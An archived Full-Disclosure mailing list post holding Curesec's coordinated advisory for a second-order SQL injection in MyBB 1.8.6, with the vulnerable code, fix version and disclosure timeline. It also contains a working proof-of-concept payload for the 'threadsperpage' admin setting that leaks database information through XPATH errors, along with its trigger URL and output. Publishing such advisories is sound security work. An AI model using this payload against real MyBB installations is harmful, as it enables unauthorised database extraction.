lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Thu, 15 Sep 2016 17:01:50 +0200
From: "Curesec Research Team (CRT)" <crt@...esec.com>
To: fulldisclosure@...lists.org
Subject: [FD] MyBB 1.8.6: SQL Injection

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    MyBB 1.8.6
Fixed in:            1.8.7
Fixed Version Link:  http://resources.mybb.com/downloads/mybb_1807.zip
Vendor Website:      http://www.mybb.com/
Vulnerability Type:  SQL Injection
Remote Exploitable:  Yes
Reported to vendor:  01/29/2016
Disclosed to public: 09/15/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

MyBB is forum software written in PHP. In version 1.8.6, it is vulnerable to a
second order SQL injection by an authenticated admin user, allowing the
extraction of data from the database.

3. Details

Description

CVSS: Medium 6.0 AV:N/AC:M/Au:S/C:P/I:P/A:P

The setting threadsperpage is vulnerable to second order error based SQL
injection. An admin account is needed to change this setting.

The injection takes place into a LIMIT clause, and the query also uses ORDER
BY, making an injection of UNION ALL not possible, but it is still possibly to
extract information.

Proof of Concept

Go to the settings page:
    http://localhost/mybb_1806/Upload/admin/index.php?module=config-settings&action=change&gid=7

For Setting "threadsperpage" use:
    20 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

Visit a forum to trigger injected code:
    http://localhost/mybb_1806/Upload/forumdisplay.php?fid=3

The result will be:
    SQL Error:
        1105 - XPATH syntax error: ':5.5.33-1'
    Query:
        SELECT t.*, (t.totalratings/t.numratings) AS averagerating, t.username AS threadusername, u.username FROM mybb_threads t LEFT JOIN mybb_users u ON (u.uid = t.uid) WHERE t.fid='3' AND t.visible IN (-1,0,1) ORDER BY t.sticky DESC, t.lastpost desc LIMIT 0, 20 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); 

Code

forumdisplay.php
    $perpage = $mybb-&gt;settings['threadsperpage'];
    [...]
	$query = $db-&gt;query("
		SELECT t.*, {$ratingadd}t.username AS threadusername, u.username
		FROM ".TABLE_PREFIX."threads t
		LEFT JOIN ".TABLE_PREFIX."users u ON (u.uid = t.uid)
		WHERE t.fid='$fid' $tuseronly $tvisibleonly $datecutsql2 $prefixsql2
		ORDER BY t.sticky DESC, {$t}{$sortfield} $sortordernow $sortfield2
		LIMIT $start, $perpage
	");

4. Solution

To mitigate this issue please upgrade at least to version 1.8.7:

http://resources.mybb.com/downloads/mybb_1807.zip

Please note that a newer version might already be available.

5. Report Timeline

01/29/2016 Informed Vendor about Issue
02/26/2016 Vendor requests more time
03/11/2016 Vendor releases fix
09/15/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/MyBB-186-SQL-Injection-159.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists